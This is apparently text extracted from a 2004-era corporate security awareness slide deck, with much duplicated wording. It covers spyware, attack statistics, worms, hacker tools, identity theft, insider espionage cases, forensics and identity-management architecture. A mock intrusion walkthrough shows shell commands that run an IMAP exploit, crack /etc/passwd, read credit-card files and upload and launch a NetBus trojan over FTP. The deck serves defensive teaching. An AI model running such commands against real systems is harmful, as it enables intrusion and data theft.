designing a secure organization

Designing a Secure OrganizationDesigning a Secure Organization

What is the Problem?What is the Problem?

2002-2004 Security StatisticsCommon Threats

Identity TheftAnatomy of Attack

Incident Response & ForensicsFixing The Problem

Where are we today?

Blended Threats: A Deadly CombinationBlended Threats: A Deadly Combination

Blended threats combine hacking, DoS, and worm-like propagation

Can rapidly compromise millions of machines

Often spread without human interaction

Importance: Create confidentiality

breaches Corrupt system integrity Impact availability of data

and systems, compromise patient care

Klezsadmind

BugBear

CodeRed

NimdaWorm Blaster

What is Spyware?What is Spyware?

Spyware is a non-viral application (surveillance tool) Spyware is a non-viral application (surveillance tool) that is loaded without the user’s knowledge and can that is loaded without the user’s knowledge and can monitor computer activity (Trojans), such as:monitor computer activity (Trojans), such as: Keystroke tracking and captureKeystroke tracking and capture Email loggingEmail logging Instant messaging usage and snapshotsInstant messaging usage and snapshots Modifying application/OS behavior (e.g. Modifying application/OS behavior (e.g.

CoolWebSearch)CoolWebSearch) Spyware and adware can increase business risks:Spyware and adware can increase business risks:

Theft of confidential dataTheft of confidential data Unauthorized enterprise accessUnauthorized enterprise access Reduced PC performanceReduced PC performance Increased bandwidth wasteIncreased bandwidth waste

How do People Get Infected?How do People Get Infected?

Web browsingWeb browsing Unauthorized downloadsUnauthorized downloads File swappingFile swapping Email attachmentsEmail attachments Instant messagingInstant messaging Installing “legitimate software” Installing “legitimate software”

(malicious mobile code)(malicious mobile code)

Dec 03

Mar 04 Apr 04 May 04* June 04* July 04 Aug 04-

100,000

1,000,000

900,000

800,000

700,000

600,000

500,000

400,000

300,000

200,000

1,100,000

1,200,000

The Problem is Growing

Sept 04

1,300,000

1,400,000

1,500,000

*Estimates of average monthly increase

Source: CA Security Advisory Team, Center for Pest Research

Number of Spyware Reports

Gartner Confirms the Spyware ThreatGartner Confirms the Spyware Threat

““At mid-2004, At mid-2004, Gartner customers are seeing a surge Gartner customers are seeing a surge in manifestations of ‘spyware,’in manifestations of ‘spyware,’ invasive methods to invasive methods to steal user privacy that disrupt users and their steal user privacy that disrupt users and their workstations at home and at work. Customers workstations at home and at work. Customers report that the cleanup effort may take a few hours, report that the cleanup effort may take a few hours, but that in no time at all, but that in no time at all, the same systems are the same systems are infected again.”infected again.”

Spyware Will Cost You Time and Spyware Will Cost You Time and MoneyMoney

Microsoft estimates that spyware is responsible for Microsoft estimates that spyware is responsible for 50% of all PC crashes50% of all PC crashes

Dell reports 20% of its technical support calls Dell reports 20% of its technical support calls involve spywareinvolve spyware

Sources: InformationWeek, “Tiny, Evil Things,” George Hulme and Thomas Claburn, April 26, 2004 -and-

http://www1.us.dell.com/content/topics/global.aspx/corp/pressoffice/en/2004/2004_07_20_rr_000?c=us&l=en&s=dhs&cs=19

The Effect of SpywareThe Effect of Spyware

Adware andAdware and

CookiesCookies Track user Track user

activity on activity on the Internetthe Internet

Collect Collect personal personal informationinformation

Pop-Up AdsPop-Up Ads Collect Collect

information information for cookiesfor cookies

Interrupt Interrupt user user transactions transactions on the on the InternetInternet

Flood users Flood users with ads and with ads and freeze freeze machinesmachines

Install Install utilities that utilities that modify user modify user servicesservices

HijackersHijackers Modify Modify

content of content of web pagesweb pages

Block access Block access to websitesto websites

Redirect Redirect users to users to unintended unintended websiteswebsites

Install Install hidden/backdhidden/backdoor oor processes processes and services and services that are that are tightly bound tightly bound to OSto OS

Disrupt Disrupt websites websites used for used for mission-mission-critical critical applicationsapplications

Spyware (Overt)Spyware (Overt) Gains a Gains a

remote remote control control capability, capability, which which includes includes searching searching and reading and reading local fileslocal files

Has a self-Has a self-updating updating capabilitycapability

Often Often includes a includes a network network sniffersniffer

Can usually Can usually activate activate webcam or webcam or microphonemicrophone

Usually logs Usually logs all all keystrokeskeystrokes

SE

CU

RIT

Y T

HR

EA

T

SYSTEM DEGRADATION

Anti-Spyware Business DriversAnti-Spyware Business Drivers Mitigate risk and limit legal liabilityMitigate risk and limit legal liability

Protect from unauthorized access and information Protect from unauthorized access and information theft theft

Reduce threat to employees, partners, customers, Reduce threat to employees, partners, customers, intellectual property, regulatory compliance and brandintellectual property, regulatory compliance and brand

Help ensure business continuityHelp ensure business continuity Maintain employee productivityMaintain employee productivity Avoid business disruptions and system downtimeAvoid business disruptions and system downtime Reduce bandwidth wasteReduce bandwidth waste

Reduce costsReduce costs Lack of resources to research new threats Lack of resources to research new threats Minimize help desk calls due to spyware infestationMinimize help desk calls due to spyware infestation Costly impact of spyware infested machines (time and Costly impact of spyware infested machines (time and

money)money)

Anti-Spyware Complements Anti-Spyware Complements Traditional MethodsTraditional Methods

VirusesWormsTrojans

Hack in ProgressRouted AttackPort Scan

Buffer OverflowsIE ExploitsOutlook Exploits

Spyware

Adware

Hacker Tools

DistributedDenial-of-Service

Zombies

Keyloggers

Trojans

Security StatisticsSecurity Statistics

General Internet attack trends are showing a 64% annual rate of General Internet attack trends are showing a 64% annual rate of growth growth SymantecSymantec

The average company experiences 32 cyber-attacks per week The average company experiences 32 cyber-attacks per week CheckpointCheckpoint

The average measurable cost of a serious security incident in Q1/Q2 The average measurable cost of a serious security incident in Q1/Q2 2004 was approximately $500,000 2004 was approximately $500,000 UK Dept of Trade & IndustryUK Dept of Trade & Industry

Identify theft related personal information is selling for $500-$1000 Identify theft related personal information is selling for $500-$1000 per record per record CFE ResourceCFE Resource

Average of 79 new vulnerabilities per week in 2004!!Average of 79 new vulnerabilities per week in 2004!! Eeye Digital SecurityEeye Digital Security

According to the 2003 Computer Security Institute surveyAccording to the 2003 Computer Security Institute survey

90% of companies had security breaches in the past 12 months90% of companies had security breaches in the past 12 months 80% acknowledged financial losses as a result80% acknowledged financial losses as a result 40% detected denial of service attacks40% detected denial of service attacks 40% detected system penetration from outside40% detected system penetration from outside 33% detected internal attack sources33% detected internal attack sources

The most serious and expensive losses were of proprietary information. The most serious and expensive losses were of proprietary information.

Yet these companies seem to be doing all the right things when it comes Yet these companies seem to be doing all the right things when it comes to information security:to information security:

90% use anti-virus software90% use anti-virus software 89% use firewalls89% use firewalls 60% use intrusion detection systems60% use intrusion detection systems

Statistics from the FBI & Interpol on hacking:Statistics from the FBI & Interpol on hacking:

More Security StatisticsMore Security Statistics

More vulnerabilities = higher likelihood of attack More vulnerabilities = higher likelihood of attack Faster attack propagation = less time to reactFaster attack propagation = less time to react

Initial Compromise Initial Compromise RateRate

Code Red Code Red (2001)(2001)

1.8 hosts / hour1.8 hosts / hour

Slammer Slammer (2003)(2003)

420 hosts / hour420 hosts / hour

Infected Pop. Doubling Infected Pop. Doubling TimeTime

Code RedCode Red 37 min.37 min.

SlammerSlammer 8.5 sec.8.5 sec.

Single Host Scan RateSingle Host Scan Rate Code RedCode Red 11 probes / sec.11 probes / sec.

SlammerSlammer 26,000 probes / 26,000 probes / secsec

Vulnerable Population Vulnerable Population Saturation Saturation

Code RedCode Red 24 hours24 hours

SlammerSlammer 30 minutes30 minutes

A Total Novice Can be a Hacker TodayA Total Novice Can be a Hacker Today

Anatomy Of AttackAnatomy Of Attack

Common ThreatsCommon Threats

ThreatsThreats

Hackers – “Script Kiddies”Hackers – “Script Kiddies” Employees – former and Employees – former and

disgruntleddisgruntled Domestic Competitors – Domestic Competitors –

“Competitive Intelligence”“Competitive Intelligence” State Sponsored & Corporate State Sponsored & Corporate

EspionageEspionage Extremists – Earth Liberation Extremists – Earth Liberation

Front (ELF)Front (ELF)

Federal'naya Sluzhba Federal'naya Sluzhba Bezopasnosti Bezopasnosti

ELF ELF

http://www.fas.org/irp/world/russia/fsb/fsb_logo.gif

Common Threats (Continued)Common Threats (Continued)

Physical – equipment, Physical – equipment, machinery, mines, office machinery, mines, office buildings, soft targetsbuildings, soft targets

Personnel – unfettered Personnel – unfettered access to network-access to network-information resources, information resources, elicitation techniques, elicitation techniques, defamation of defamation of character/slandercharacter/slander

Network/Information Assets Network/Information Assets – Network access, database – Network access, database and file access, web server, and file access, web server, mail servermail server

Anatomy of AttackAnatomy of AttackModis OperandiModis Operandi

Physical PenetrationsPhysical Penetrations

Company Profiling – Open Source ResearchCompany Profiling – Open Source Research

Footprinting – Scanning – Enumeration – Penetration – Escalate Footprinting – Scanning – Enumeration – Penetration – Escalate Privilege – Stealing/Damaging Corp. informationPrivilege – Stealing/Damaging Corp. information

Trojans – remote controlling systemsTrojans – remote controlling systems

Buffer OverflowsBuffer Overflows

Known ExploitsKnown Exploits

Port Redirection of PacketsPort Redirection of Packets

Zone TransfersZone Transfers

SNMP SweepsSNMP Sweeps

Router ExploitationRouter Exploitation

Key Loggers – Software and Hardware devicesKey Loggers – Software and Hardware devices

Denial of ServiceDenial of Service

Anatomy of Attack (Continued)Anatomy of Attack (Continued)

Physical PenetrationsPhysical Penetrations

SurveillanceSurveillance

Dumpster DivingDumpster Diving

Impersonation of Authorized Impersonation of Authorized PersonnelPersonnel

bigwidget.net

Registrant :Big Widget, Inc. (BIGWIDGET_DOM) 1111 Big Widget Drive Really Big, CA 90120 US

Domain Name: BIGWIDGET.NET

Administrative Contact, Technical Contact: Zone Contact, Billing Contact: Simms, Haywood (HS69) Dodge, Rodger (RD32) [email protected] [email protected] 1111 Big Widget Drive, UMIL04-07 1111 Big Widget Drive, UMIL04-47 Really Big, CA 90210 Really Big, CA 90210 678-443-6001 678-443-6014

Record last updated on 24-June-2000Record expires on 20-Mar-2010Record created on 14-Mar-1998Database last updated on 7-Jun-2000 15:54

Domain servers in listed order:

EHECATL.BIGWIDGET.NET 10.1.1.53NS1-AUTH.SPRINTLINK.NET 206.228.179.10NS.COMMANDCORP.COM 130.205.70.10

~$ telnet mail.bigwidget.net 25

Trying 10.1.1.10 ...

Connected to mail.bigwidget.net

Escape character is '^]'.

hacker:

hacker:~$

Connection closed by foreign host.

telnet mail.bigwidget.net 143

Trying 10.1.1.10...

Connected to mail.bigwidget.net. * OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)(Report problems in this server to [email protected])

. logout

* BYE bigwidget IMAP4rev1 server terminating connection. OK LOGOUT completed

Connection closed by foreign host.

hacker ~$ ./imap_exploit mail.bigwidget.com

IMAP Exploit for Linux.Author: Akylonius ([email protected])Modifications: p1 ([email protected])

Completed successfully.

hacker ~$ telnet mail.bigwidget.com

Trying 10.1.1.10...

Connected to mail.bigwidget.com.

Red Hat Linux release 4.2 (Biltmore)Kernel 2.0.35 on an i686

root

bigwidget:~# whoami

root

bigwidget:~# cat ./hosts

127.0.0.1 localhost localhost.localdomain10.1.1.9 thevault accounting10.1.1.11 fasttalk sales10.1.1.12 geekspeak engineering10.1.1.13 people human resources10.1.1.14 thelinks marketing10.1.1.15 thesource information systems

bigwidget:~# cd /etc

login:

Allan B. Smith 6543-2223-1209-4002 12/99Donna D. Smith 6543-4133-0632-4572 06/98Jim Smith 6543-2344-1523-5522 01/01Joseph L.Smith 6543-2356-1882-7532 04/02Kay L. Smith 6543-2398-1972-4532 06/03Mary Ann Smith 6543-8933-1332-4222 05/01Robert F. Smith 6543-0133-5232-3332 05/99

bigwidget:~#

cat visa.txt

cd /data/creditcards

bigwidget:~#

bigwidget:~# crack /etc/passwd

Cracking /etc/passwd...

username: bobman password: nambobusername: jsmith password: redbirdsusername: root password:

bigwidget:~# ftp thesource

Connected to thesource220 thesource Microsoft FTP Service (Version 4.0).

Name: jsmith

331 Password required for jsmith.

Password: ********

230 User jsmith logged in.

Remote system type is Windows_NT.

ftp> cd \temp

250 CDW command successful.

ftp> send netbus.exe

local: netbus.exe remote: netbus.exe

200 PORT command successful.150 Opening BINARY mode data connection for netbus.exe226 Transfer complete.

ftp>

ftp>

quit

thevault:~$ telnet thesource

Trying 10.1.1.15... Connected to thesource.bigwidget.com.Escape character is '^]'.

Microsoft (R) Windows 2000

Welcome to MS Telnet ServiceTelnet Server Build 5.00.98217.1login: jsmith

password: ********

*===============================================================Welcome to Microsoft Telnet Server.*===============================================================C:\> cd \temp

C:\TEMP> netbus.exe

Connected to the.source.bigwidget.com

NetBus 1.6, by cf

Screendump

Postmaster < [email protected] >

[email protected]; [email protected]

Greetings < URGENT >

Greetings Bigwidget employees:

I have officially compromised your entire system, and have obtained all of your accounting information.

Yours Truly,

Friendly Hacker

David Smith

mailto:[email protected]

Router

Web

Clients & Workstations

NetBusNetBusFTP

imapimap

Firewall


Attempts to download the DCOM RPC patch from Microsoft's Windows Update Web site, install it, and then reboot the computer.

Checks for active machines to infect by sending an ICMP echo request, or PING, which will result in increased ICMP traffic.

Attempts to remove W32.Blaster.Worm

Payload:

Deletes files: Deletes msblast.exe.

Causes system instability: Vulnerable Windows 2000 machines will

experience system instability due to the RPC service crash.

Compromises security settings: Installs a TFTP server on all the infected machines

Malicious CodeMalicious Code


W32.Welchia.Worm

W32.Blaster.Worm is a worm that exploits the DCOM RPC vulnerability using TCP port 135.

Payload Trigger: If the date is the 16th of the month until the end of that month if it's before August, and every day from August 16 until December 31.

Payload:

Performs Denial of Service against windowsupdate.com

Causes system instability: May cause machines to crash.

Compromises security settings: Opens a hidden remote cmd.exe shell.

W32.Blaster.Worm

Nmap (Network Scanner) is an open source, freely distributed port scanner.

Designed to scan large networks rapidly.

Can be used to target specific services.

Includes features to evade Intrusion Detection.

Utilizes TCP/IP fingerprinting for remote host identification.

NmapNmap


Create outbound or receive Create outbound or receive inbound TCP or UPD inbound TCP or UPD connectionsconnections

Feature - rich network Feature - rich network debugging and “exploration” debugging and “exploration” tooltool

Port ScanningPort Scanning

Remote “backdoor” shellRemote “backdoor” shell

SYN Bombing – Denial of SYN Bombing – Denial of Service AttacksService Attacks

Cryptcat - Can encrypt traffic Cryptcat - Can encrypt traffic using twofish encryptionusing twofish encryption

NetcatNetcat““The TCP/IP The TCP/IP Swiss Army Swiss Army

Knife”Knife”


Wireless network discovering and auditing toolWireless network discovering and auditing tool

Decodes traffic to provide information about the networkDecodes traffic to provide information about the network

Interfaces with GPS to track locations of discovered networksInterfaces with GPS to track locations of discovered networks

Wireless ToolsWireless Tools

Wireless network discoveryWireless network discovery

Displays and tracks information about wireless networksDisplays and tracks information about wireless networks

Runs on Microsoft WindowsRuns on Microsoft Windows

Wireless tool that recovers wireless encryption KeyWireless tool that recovers wireless encryption Key

Monitors wireless traffic passivelyMonitors wireless traffic passively


Back OrificeBack Orifice – A powerful “Network – A powerful “Network Administrator” tool that is small in size, Administrator” tool that is small in size, extensible, and free from CDC.extensible, and free from CDC.

Keystroke LoggerKeystroke Logger

Registry EditingRegistry Editing

Redirection of TCP/IP connectionsRedirection of TCP/IP connections

File TransfersFile Transfers

TrojansTrojans

Sub-SevenSub-Seven – An extremely dangerous – An extremely dangerous Trojan that enables full control of hostTrojan that enables full control of host

Erase harddrivesErase harddrives

Execute programsExecute programs


http://www.cultdeadcow.com/

L0ftcrackL0ftcrack

Security experts from industry, Security experts from industry, government, and academia cite weak government, and academia cite weak passwords as one of the most critical passwords as one of the most critical internet security threats. internet security threats.

L0phtCrack can obtain 18% of the L0phtCrack can obtain 18% of the passwords within 10 minutes in a passwords within 10 minutes in a recent demonstration.recent demonstration.

90% of the passwords were 90% of the passwords were recovered within 48 hours on a recovered within 48 hours on a Pentium II/300Pentium II/300

LC3 can even sniff encrypted LC3 can even sniff encrypted passwords from the passwords from the challenge/response exchanged when challenge/response exchanged when one machine authenticates to another one machine authenticates to another over the network.over the network.


Tools Used during Attacks

Connected to www.test.com

www.test.com

NetBus; UltraScan; WinFinger; SATAN; SAINT; Winnuke; BackOrfice; NMAPNetBus; UltraScan; WinFinger; SATAN; SAINT; Winnuke; BackOrfice; NMAP

In addition to numerous handbooks & tutorials:In addition to numerous handbooks & tutorials:


Abraham Abdallah, 32, shown here in a police photo released March 20, allegedly

masterminded the theft of identities by using computers in a Brooklyn library to obtain

credit records of chief executives. (NYPD/Reuters)

Man Charged with Using Internet to

Steal Millions from Oprah, Spielberg,

and Others

N E W Y O R K, March 20 — A Brooklyn man has been charged

with stealing millions from the rich and famous through the Internet, apparently using a public library computer to help him pull off the

heist.

Identity TheftIdentity Theft

Personal InformationPersonal Information

NameName AddressAddress Telephone numberTelephone number Date of birthDate of birth Driver’s license #Driver’s license # Identification card #Identification card # Social Security #Social Security #

Bank account #Bank account # Utility account #Utility account # Medical Record #Medical Record # Credit card #Credit card # Cell phone/pager #Cell phone/pager # Internet addressInternet address

Just the facts…

Types of identity theft fraudTypes of identity theft fraud

Credit card – 42%Credit card – 42% Telephone or utility – 20%Telephone or utility – 20% Bank – 13%Bank – 13% Employment related – 9%Employment related – 9% Loans – 7%Loans – 7% Government documents/benefits – 6%Government documents/benefits – 6% Medical Records – 19%Medical Records – 19% Attempted – 10%Attempted – 10%

How Does Identity Theft Happen? How Does Identity Theft Happen? Discovery…Discovery…

• Applying for a loan/refinance/credit cards• Sign-in Rosters• Canadian/Netherlands Lotter: “You Have WON”• Free Credit Report Emails• Email chain letters/pyramid schemes• “Find out everything on anyone”• Questionnaires• Account Verification• Résumé's – Social Security numbers/DOB

Specific Warnings…Specific Warnings… EBAY AND PAYPAL ACCT. VERIFICATION SCAMS, July 18, 2003EBAY AND PAYPAL ACCT. VERIFICATION SCAMS, July 18, 2003

Do not respond to emails from E-Bay or PayPal that ask for Do not respond to emails from E-Bay or PayPal that ask for credit information, SSN and other personal data. ITRC is aware credit information, SSN and other personal data. ITRC is aware that many of these are scams and the country is being blanketed that many of these are scams and the country is being blanketed with them currently. with them currently.

FTC WARNING—DO NOT CALL REGISTRY, confirmed May 9, FTC WARNING—DO NOT CALL REGISTRY, confirmed May 9, 20032003Companies and websites have been making deceptive claims Companies and websites have been making deceptive claims that they can register consumers in advance for the FTC's do-that they can register consumers in advance for the FTC's do-not-call list. Two are being sued by the FTC at this time. These not-call list. Two are being sued by the FTC at this time. These sites include: Free-Do-Not-Call-List.org and National-Do-Not-Call-sites include: Free-Do-Not-Call-List.org and National-Do-Not-Call-List.us. Neither of these are official governmental sites. One of List.us. Neither of these are official governmental sites. One of them is even charging a service fee. them is even charging a service fee.

Unauthorized "hospital personnel" asking for info, Sept. 2003Unauthorized "hospital personnel" asking for info, Sept. 2003here are some scam artists posing as hospital employees (and here are some scam artists posing as hospital employees (and we can assume this goes on in nursing homes) asking patients we can assume this goes on in nursing homes) asking patients to either verify information or to help fill in some blanks. They to either verify information or to help fill in some blanks. They carry clipboards and may even wear hospital or lab coats. carry clipboards and may even wear hospital or lab coats. Hospital personnel must be on the lookout for these con artists Hospital personnel must be on the lookout for these con artists and patients (and family members) must require identification and patients (and family members) must require identification prior to giving out any information.prior to giving out any information.

Who to contact…Who to contact…

Credit card companiesCredit card companies BankBank Insurance CompaniesInsurance Companies Medical Providers (Hospitals, Dental Offices)Medical Providers (Hospitals, Dental Offices) Social securitySocial security Department of Motor VehiclesDepartment of Motor Vehicles Utility companyUtility company ID Theft ClearinghouseID Theft Clearinghouse

Prevention…Prevention…

Shred any document that Shred any document that contains personal information contains personal information

Shred unused credit Shred unused credit solicitationssolicitations

Request and review your Request and review your credit report on a regular credit report on a regular basisbasis

NEVER give out personal NEVER give out personal information unless you information unless you initiate the processinitiate the process

Carefully read documents Carefully read documents and question the use of your and question the use of your personal informationpersonal information

Incident Response

&

Forensic Investigations

RCCEEG is an organization of RCCEEG is an organization of law enforcement officers, law enforcement officers, prosecutors and computer prosecutors and computer professionals regional and professionals regional and surrounding counties; dedicated surrounding counties; dedicated to providing manpower, technical to providing manpower, technical and legal assistance in computer and legal assistance in computer crime education and crime education and investigations.investigations.

NIPC - Detect, deter, NIPC - Detect, deter, assess, warn, respond, and assess, warn, respond, and investigate unlawful acts investigate unlawful acts involving computer and involving computer and information technologies information technologies and unlawful acts, both and unlawful acts, both physical and cyber, that physical and cyber, that threaten or target our critical threaten or target our critical infrastructuresinfrastructures

FBI Cyber Crime DivisionFBI Cyber Crime DivisionThe FBI's Cyber Crime The FBI's Cyber Crime Division is responsible for Division is responsible for criminal investigations of criminal investigations of intellectual property, high intellectual property, high tech and computer crimes. tech and computer crimes.

Incident Response & Forensic InvestigationsIncident Response & Forensic Investigations

“B”“Ramon Garcia”“Jim Baker”“G. Robertson”“Mr. Diamonds”

Searched investigative database

Hacked into the FBI’s top Russian Counterintelligence Chief’s computer – Caught, but said it was to show the vulnerability of the computer systems

27 year veteran with FBI

Involved in some of the most important counterintelligence cases in recent times

FBI Agent Robert P. Hanssen

Incident Response & Forensic Investigations

He did multiple U-turns - Counter surveillance

Had hand-held GPS for finding drop or signal sites

As of Feb 2001 had consumer debts of $53,000

Brian P. Regan, AF MSG ( R )

20-year military career at the National Reconnaissance Office

Daily access to Intelink

Arrested at Dulles International Airport as he was about to board a flight for Switzerland via Germany

Country A, which sources said was Libya

Less than a month before his Aug. 30, 2000, retirement from the Air Force, Regan established an e-mail address under a pseudonym -- Steven Jacobs of Alexandria -- which he planned to use for surreptitious contacts with foreign governments, according to the FBI affidavit

Created a cache of classified documents, files, and diskettes.



The arrest of Ahmed Fathy Mehalba, a former soldier who failed to graduate from Fort Huachuca and a naturalized U.S. citizen of Egyptian descent, was taken into custody Monday at Boston's Logan International Airport. The inspectors found 132 CD-ROMs, some containing classified documents.

During the interview, Mehalba admitted that his uncle was an Intelligence Officer for the Egyptian army.

U.S. Southern Command officials said Mehalba had been employed at the facility as a contractor for The Titan Corporation, a U.S. contractor in San Diego that supports homeland security and counterterrorism.

DMZ•E-mail•File Transfer•HTTP

RouterRouter

Human ResourcesHuman Resources

MarketingMarketing

EngineeringEngineering

ManufacturingManufacturing

External Threat

Corporate Network

Internal Threat

Wireless AP


Process of collecting, correlating, analyzing data and Process of collecting, correlating, analyzing data and content moving through a networkcontent moving through a network

N-gram analysis is used to determine relationships between N-gram analysis is used to determine relationships between like types of information such as SMTP, JPEG, HTTP, and GIF.like types of information such as SMTP, JPEG, HTTP, and GIF.

eTrust Network ForensicseTrust Network Forensics


EnCaseEnCase Award winning and validated by the courts, EnCase Award winning and validated by the courts, EnCase allows law enforcement and IT professionals to conduct a allows law enforcement and IT professionals to conduct a powerful, yet completely non-invasive computer forensic powerful, yet completely non-invasive computer forensic investigation.investigation.

Reads the Dynamic Disk partition structure and resolves Reads the Dynamic Disk partition structure and resolves all of the possible configurations.all of the possible configurations.


Report of Investigation

ROI

Date

Subject: LASTNAME, Firstname City, State

Investigative Memorandum for Record IMFR2

Date


Investigative Memorandum for Record IMFR1

Date



Key Success FactorsKey Success Factors

Limited Knowledge – Need to KnowLimited Knowledge – Need to Know

Trained Professionals – Technical & InvestigationsTrained Professionals – Technical & Investigations

Proper Evidence HandlingProper Evidence Handling

Liaison with Local and Federal Law EnforcementLiaison with Local and Federal Law Enforcement

Civil v.s. Criminal ActionsCivil v.s. Criminal Actions


Fixing The ProblemFixing The Problem

Security Architecture CapabilitiesSecurity Architecture Capabilities

Security SponsorshipSecurity Sponsorship Security StrategySecurity Strategy Security Function StructureSecurity Function Structure Security Function Resources Security Function Resources

and Skillsetand Skillset Security Policies, Standards, Security Policies, Standards,

Guidelines, and ProceduresGuidelines, and Procedures Security OperationsSecurity Operations Security MonitoringSecurity Monitoring User ManagementUser Management

User AwarenessUser Awareness Application SecurityApplication Security Database and Metadata SecurityDatabase and Metadata Security Host SecurityHost Security Internal Network SecurityInternal Network Security Network Perimeter SecurityNetwork Perimeter Security Physical and Environmental SecurityPhysical and Environmental Security Contingency PlanningContingency Planning

16 Distinct Client Capabilities can be Assessed, Architected, 16 Distinct Client Capabilities can be Assessed, Architected,

Integrated, and Monitored:Integrated, and Monitored:

Enterprise Security ModelEnterprise Security Model

Regulatory EnvironmentRegulatory Environment UK: Personal Information Protection and Electronic UK: Personal Information Protection and Electronic

Documents Act (2001)Documents Act (2001)

US: HIPAA (Health Insurance Portability Accountability Act) US: HIPAA (Health Insurance Portability Accountability Act)

US: Gramm Leach Bliley (GLBA)US: Gramm Leach Bliley (GLBA)

US: California: SB 1386 – mandates public disclosure of US: California: SB 1386 – mandates public disclosure of computer-security breaches in which confidential information computer-security breaches in which confidential information may have been compromised. Becomes active on July 1, may have been compromised. Becomes active on July 1, 2003. 2003.

EU: European Data Directive 95/46/ECEU: European Data Directive 95/46/EC

UK: Data Protection Act of 1998UK: Data Protection Act of 1998

http://www.privacyinternational.org/countries/index.htmlhttp://www.privacyinternational.org/countries/index.html

Privacy is a Patchwork Quilt...Privacy is a Patchwork Quilt...Each law is but One of the PatchesEach law is but One of the Patches

Fair Credit Reporting Actof 1970

Privacy Act of 1974

Right to FinancialPrivacy Act of 1978

Electronic Communications Privacy Act of 1986

50 Statelaws

FTC oversight

Recent legislation (more patches):Anti-spam bill (Unsolicited Commercial Electronic Mail Act of 2000)The Privacy Policy Enforcement in Bankruptcy Act of 2000Delahunt and Bachus’s bill (July 2000)Cantwell Legislation (July 2004)

European Privacy Directive

Financial Services Modernization Act of 1999(Gramm-Leach-Bliley)

DistributedApps

DistributedApps

Sun One Dir

Sun One Dir

USER

Info Sec

IT Admins

Audit &ReportingAudit &

Reporting

ProvisioningProvisioning

IT Admins

Mainframe(ACF2)

Mainframe(ACF2)

OracleOracle

MS SQLMS SQL

MSActive Dir

MSActive Dir

EnterpriseApps

EnterpriseApps

EmailEmail NovelleDir

NovelleDir

UnixHPUXUnix

HPUX

ExternalLDAP SerExternal

LDAP Ser

Web AppsWeb Apps• Multiple Logins &

Passwords

• Multiple administrative contacts and processes

• Multiple profiles to manage

AccessManagement

AccessManagement

Current StateCurrent State

PayrollPayroll • Applications provisioned one at a time

• Slow, costly, insecure On-boarding & Off-boarding

• Access changes handled one at time by platforms specific admins

• No single view of user access & activities

• Limited means to assess and report security posture

Helpdesk

Approving Manager

IntranetIntranet

DivisionApps

DivisionApps

•Access Needs

•Password & Profile

Management

•Access Needs


Management

HigherIAM

Management Cost

Complex ComplianceEnvironment

HigherRisk

LowerProductivity

LowerQuality

of Service

Access ControlAccess Control

App DB OSApp DB OS App DB OS


Policy Engine



Policy Engine GUI



Policy EngineWeb GUI


Access ControlAccess ControlHR System

Policy EngineWeb GUI



Policy Engine

Authentication Service

Web GUI



Policy Engine


Web GUI

App DB OS___ ___ ___ ___ ___ ______ ___ ___ ___ ___ ___

App DB OS___ ___ ___ ___ ___ ______ ___ ___ ___ ___ ___

App DB OS___ ___ ___ ___ ___ ______ ___ ___ ___ ___ ___


Policy Engine

Audit/Command Center


Web GUI

App DB OS___ ___ ___ ___ ___ ______ ___ ___ ___ ___ ___

App DB OS___ ___ ___ ___ ___ ______ ___ ___ ___ ___ ___

App DB OS___ ___ ___ ___ ___ ______ ___ ___ ___ ___ ___


Policy Engine



Web GUI

Enhance OSEnhance OSEnhance OS

App DB OS___ ___ ___ ___ ___ ______ ___ ___ ___ ___ ___

App DB OS___ ___ ___ ___ ___ ______ ___ ___ ___ ___ ___

App DB OS___ ___ ___ ___ ___ ______ ___ ___ ___ ___ ___


Policy Engine



Web GUI

Enhance OSEnhance OSEnhance OS

App DB OS___ ___ ___ ___ ___ ______ ___ ___ ___ ___ ___

App DB OS___ ___ ___ ___ ___ ______ ___ ___ ___ ___ ___

App DB OS___ ___ ___ ___ ___ ______ ___ ___ ___ ___ ___

Forensics Repository

MSActive Dir

MSActive Dir

IAM Shared Services Infrastructure

DistributedApps

DistributedApps

Sun One Dir

Sun One Dir

USER

Audit &ReportingAudit &

Reporting

ProvisioningProvisioning

Mainframe(ACF2)

Mainframe(ACF2)

OracleOracle

MS SQLMS SQLEnterprise

AppsEnterprise

Apps

EmailEmail NovelleDir

NovelleDir

UnixHPUXUnix

HPUX

ExternalLDAP SerExternal

LDAP Ser

Web AppsWeb Apps

AccessManagement

AccessManagement

IAM Future StateIAM Future State

PayrollPayroll

Helpdesk

Approving Manager

•Access Needs


Management

•Access Needs


Management

IntranetIntranet

DivisionApps

DivisionApps

Info Sec

IT Admins

IT Admins

Access Control• Policy Store• User Store

Access Control• Policy Store• User Store

Provisioning• Engine

• Workflow• Directory

Provisioning• Engine

• Workflow• Directory

Audit &Reporting• Engine

• Data Store

Audit &Reporting• Engine

• Data Store

•Self-Service Password &

Profile Management

•Self-Service Password &

Profile Management

Improved Productivity

&User Satisfaction

Improved Operational

Efficiency

Reduced Administrative Cost

Improved ComplianceReduced Overall Risk

What are the immediate steps today?What are the immediate steps today?

Commitment to ProceedCommitment to Proceed Executive level sponsorship of Enterprise Executive level sponsorship of Enterprise

Security ProgramSecurity Program Establish Information Security OfficeEstablish Information Security Office Commit budget for FY 2003-2005Commit budget for FY 2003-2005

Enterprise Security Program should be implemented as anEnterprise Security Program should be implemented as anenterprise initiative to ensure project successenterprise initiative to ensure project success

Enterprise Security Program should be implemented as anEnterprise Security Program should be implemented as anenterprise initiative to ensure project successenterprise initiative to ensure project success

What are the short term steps?What are the short term steps?

Mitigate RisksMitigate Risks Implement Information Security Policies InfrastructureImplement Information Security Policies Infrastructure Implement Security Monitoring ToolsImplement Security Monitoring Tools

Demonstrate CommitmentDemonstrate Commitment Establish Enterprise Security Program OfficeEstablish Enterprise Security Program Office Commit Budget and Resources for Enterprise Security Commit Budget and Resources for Enterprise Security

ProgramProgram

InitiateEnterpriseSecurityProgram

CompleteBaseline

Capabilities

CompleteService

Capabilities

CompleteEnabling

Capabilities

What are the long term steps?What are the long term steps?

Maturation of Enterprise Security CapabilitiesMaturation of Enterprise Security Capabilities

1.1. Baseline Capabilities – formalize core capabilities Baseline Capabilities – formalize core capabilities to mitigate enterprise information security risksto mitigate enterprise information security risks

2.2. Service Capabilities – deliver security services to Service Capabilities – deliver security services to support business requirements and end userssupport business requirements and end users

3.3. Enabling Capabilities – deploy security Enabling Capabilities – deploy security capabilities to enable business strategiescapabilities to enable business strategies

5 Initiatives of an Enterprise Security Architecture 5 Initiatives of an Enterprise Security Architecture

